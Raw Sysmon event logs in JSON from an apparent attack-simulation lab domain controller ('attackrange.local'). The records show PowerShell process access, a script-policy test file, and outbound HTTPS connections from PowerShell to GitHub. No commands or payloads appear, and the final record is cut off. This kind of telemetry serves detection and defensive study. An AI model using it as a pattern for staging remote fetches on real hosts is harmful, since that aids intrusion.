{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4994,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4995,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4996,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4316\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A4A03)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","SourceProcessId":"4984","SourceThreadId":"4316","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010E3F20700}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A4A03)","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4997,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010E3F20700}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4998,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010E3F20700}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4999,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.249\r\nProcessGuid: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nProcessId: 4944\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rwe5gzri.k2i.ps1\r\nCreationUtcTime: 2020-08-01 05:52:38.249","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.249","ProcessGuid":"{A837DB8D-0326-5F25-0000-0010E3F20700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rwe5gzri.k2i.ps1","CreationUtcTime":"2020-08-01 05:52:38.249","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5000,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.296\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.296","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010E3F20700}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5001,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.296\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.296","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010E3F20700}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5002,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.331\r\nProcessGuid: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nProcessId: 4944\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54956\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 140.82.113.4\r\nDestinationHostname: lb-140-82-113-4-iad.github.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.331","ProcessGuid":"{A837DB8D-0326-5F25-0000-0010E3F20700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54956","DestinationIsIpv6":"false","DestinationIp":"140.82.113.4","DestinationHostname":"lb-140-82-113-4-iad.github.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5003,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.499\r\nProcessGuid: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nProcessId: 4944\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54957\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 199.232.64.133\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 